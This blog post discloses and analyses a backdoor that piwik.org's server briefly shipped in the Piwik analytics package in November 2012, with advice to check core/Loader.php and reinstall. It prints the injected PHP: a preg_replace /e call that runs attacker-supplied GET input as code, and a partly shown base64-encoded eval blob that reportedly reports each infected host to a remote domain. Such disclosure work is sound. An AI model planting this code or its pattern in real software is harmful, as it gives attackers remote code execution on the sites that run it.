Piwik sourcecode backdoored

Yet Another PHP Security Blog

Archives

Tagged Articles











Links

PHP-Sicherheit
Christopher Kunz ()
VServer Hosting

Wednesday, November 28. 2012

Piwik sourcecode backdoored

It appears that between 15:43 UTC to 23:59 UTC on November 26th, the piwik.org web server was serving a backdoored version of the popular open-source web analytics tool. This version contained some PHP code that essentially allowed for unlimited remote code execution and posted each compromise to a remote domain:



preg_replace(“/(.+)/e”, $_GET[’g’], ‘dwm’);     exit;

}

if (file_exists(dirname(_FILE_).“/lic.log”)) exit;

eval(gzuncompress(base64_decode(’eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF

/s7JuffmMlrf3y7XD09OSWbUo9RzF6XzHCz3+0pOeDW0C79s2vqtaSdOTRKZOxfXDlmJOvp8LbzHwJle/aIYEL0YWE$[..]

The eval() portion in the lower part contains a postback to http://prostoivse.com/x.php, sending the value of $_SERVER[’HTTP_HOST’] and by that giving the backdoor developer an indicator that he has just successfully infected another victim.

The actual backdoor is in the upper part. If the GET variables “g” and “s” are set, the static string “dwm” is replaced with the contents of $_GET[’g’] and the resulting string is evaluated as PHP code (/e modifier).

The backdoor postback site is still up and hosted by a company called “justhost.com”, It seems to be on a shared server. The website of justhost looks like a run-of-the-mill quasi-anonymous US hoster, with lots of shiny colorful award badges, stock imagery and (probably) a template from templatemonster.

Whois shows that the actual carrier is “unified layer”:


NetRange:       50.87.0.0 - 50.87.255.255

CIDR:           50.87.0.0/16

OriginAS:       AS46606

NetName:        UNIFIEDLAYER-NETWORK-9

NetHandle:      NET-50-87-0-0-1

Parent:         NET-50-0-0-0-0

NetType:        Direct Allocation

RegDate:        2011-01-24

Updated:        2012-11-14

Ref:            http://whois.arin.net/rest/net/NET-50-87-0-0-1





OrgName:        Unified Layer

OrgId:          BLUEH-2

Address:        1958 South 950 East

City:           Provo

StateProv:      UT

PostalCode:     84606

Country:        US

RegDate:        2006-08-08

Updated:        2012-11-26

Ref:            http://whois.arin.net/rest/org/BLUEH-2

The ARIN hdl “BLUEH-2” made me curious and after another minute of digging, I found that the AS serving the above mentioned network is actually AS46606, which is owned by BLUEHOST. Purportedly, this is one of the biggest hosters worldwide (I just heard of them for the first time in my life). Hopefully, they will C&D this abuse site soon.

If you updated your Piwik installation on Nov 26th, check piwik/core/Loader.php for the exploit code shown above and if you find it (or anything else which looks fishy), replace with a clean installation from piwik.org.

To the piwik guys: Signed archive hashes would probably be a good idea.
Posted by
Comment (1) Trackbacks (0)
Defined tags for this entry: , , , ,
Related entries by tags:

Trackbacks
Trackback specific URI for this entry

No Trackbacks

Comments
Display comments as (Linear | Threaded)

#1 - Eliovir 2012-11-29 09:26 - (Reply)

There is nothing in the development sources :

http://dev.piwik.org/trac/browser/trunk/core/Loader.php

This backdoor was in the archives?


Add Comment

Enclosing asterisks marks text as bold (*word*), underscore are made via _word_.
Standard emoticons like :-) and ;-) are converted to images.

To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.
CAPTCHA
 
 

Frontpage - Top level